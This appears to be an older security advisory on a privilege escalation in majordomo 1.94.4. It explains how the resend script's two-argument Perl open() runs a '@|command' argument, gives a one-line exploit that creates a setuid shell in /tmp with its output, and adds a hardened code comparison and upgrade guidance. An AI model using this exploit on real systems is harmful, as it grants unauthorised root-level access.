COMMAND

    majordomo

SYSTEMS AFFECTED

    majordomo 1.94.4

PROBLEM

    Brock Tellier found a vulnerability in majordomo which allows local
    users to gain elevated privileges.  He only tested the version of
    majordomo which comes with UnixWare 7.1, which is 1.94.4, but
    further testing showed that all 1.94.4 installations are vulnerable.
    In any case, it is present on the default UW7.1 installation.

    The  majordomo  wrapper  allows  users  to  run  programs  in  the
    /usr/local/majordomo directory with the  uid of owner and  the gid
    of daemon.  The permissions for wrapper are:

        -rwsr-xr-x    1 root     daemon         6464 Jan  4  1999  /usr/local/majordomo/wrapper

    but wrapper immediately setuid()'s and setgid()'s to owner:daemon
    before execing the wrapped program.  A vulnerability in
    "/usr/local/majordomo/resend" will allow us to execute arbitrary
    commands with our elevated privileges.  The following code snippet
    appears in resend, a perl script:

        # If the first argument is "@filename", read the real arguments
        # from "filename", and shove them onto the ARGV for later processing
        # by &Getopts()
        #
        if ($ARGV[0] =~ /^\@/) {
            $fn = shift(@ARGV);
            $fn =~ s/^@//;
            # two-argument open(): a $fn beginning with "|" is run as a
            # command instead of being opened as a file
            open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped");
            # ... (remainder of the block, which reads AV into @ARGV, is
            # not reproduced in the advisory)
        }

    As you can see, if our first argument to resend starts with a "@",
    resend will attempt to open() the rest of it as a filename.
    However, Perl's two-argument open() also runs a program when its
    filename argument begins with a pipe "|".  If our first argument is
    "@|id", resend will run the program "id" with full privileges.
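    As an added illustration (not code from the majordomo distribution),
    the resend-style "@filename" handling with Perl's two-argument open()
    beside a hardened three-argument form; the read_args_* and
    expand_argv names and the argument file are constructed for this
    example:

```perl
#!/usr/bin/perl
# Added example (not from the majordomo distribution): resend-style
# "@filename" argument handling, vulnerable form beside a hardened form.
use strict;
use warnings;
use File::Temp qw(tempfile);

# Vulnerable: two-argument open() treats a leading "|" as "run this
# command and write to its stdin", so a name of "|id" executes id.
sub read_args_unsafe {
    my ($fn) = @_;
    open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped");
    my @args = map { chomp; $_ } <AV>;
    close(AV);
    return @args;
}

# Hardened: three-argument open() with an explicit "<" mode never
# interprets the name as a pipe or as "-" (stdin); the pattern check
# additionally refuses anything but a plain relative-safe path.
sub read_args_safe {
    my ($fn) = @_;
    die("refusing argument file name '$fn'\n")
        unless $fn =~ m{\A[A-Za-z0-9_./-]+\z} && $fn !~ m{\.\./};
    open(my $av, '<', $fn) or die("open($fn): $!\n");
    my @args = map { chomp; $_ } <$av>;
    close($av);
    return @args;
}

# Mimic resend's ARGV convention: "@name" means read more arguments
# from name and push them onto the remaining ARGV.
sub expand_argv {
    my @argv = @_;
    if (@argv && $argv[0] =~ /^\@/) {
        (my $fn = shift @argv) =~ s/^@//;
        push @argv, read_args_safe($fn);
    }
    return @argv;
}

# Constructed sample input: a real argument file plus the pipe trick.
my ($fh, $path) = tempfile();
print $fh "-l\nlist\n";
close $fh;
print join(' ', expand_argv("\@$path", 'extra')), "\n";   # extra -l list
eval { expand_argv('@|id') };
print "rejected: $@" if $@;    # the name is refused, nothing is run
```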

    Our exploit is simple:

        bash-2.02$ /usr/local/majordomo/wrapper resend '@|cp /bin/ksh /tmp/xnec;chmod 6555 /tmp/xnec'
        resend: must specify '-l list' at /usr/local/majordomo/resend line 77.

        bash-2.02$ ls -la /tmp/xnec
        -r-sr-sr-x    1 owner    daemon       361688 Dec 29 06:26 /tmp/xnec

    There are numerous holes in majordomo's scripts.  Most of them allow
    you to specify an alternate .cf file, and that file is executed as
    majordomo.daemon or majordomo.majordomo.  A FreeBSD box that was
    tested had majordomo running as group daemon, as INSTALL suggests,
    and because mrtg was group daemon and mode 775 instead of 755 (not
    sure if that is how mrtg is installed by default) and mrtg is
    crontabbed to run as root every 5 minutes, this tiny hole in
    majordomo gives root to any local user.

SOLUTION

    The vendors of  majordomo have produced  a minor software  release
    which addresses the vulnerability in versions 1.94.4 and  earlier.
    Sites  using  affected  versions  should  immediately  upgrade  to
    majordomo 1.94.5 which is available from:

        ftp://ftp.greatcircle.com/pub/majordomo/1.94.5/majordomo-1.94.5.tgz
        ftp://ftp.sgi.com/other/majordomo/majordomo-1.94.5.tgz

    Sites using majordomo should also take this opportunity to ensure
    that their majordomo is configured correctly.  While correct
    configuration does not prevent the vulnerability listed in this
    advisory from being exploited, it may help limit the privileges a
    local user may gain.  More information on this can be found in the
    INSTALL file and in the majordomo FAQ available at:

        http://www.greatcircle.com/majordomo/FAQ.html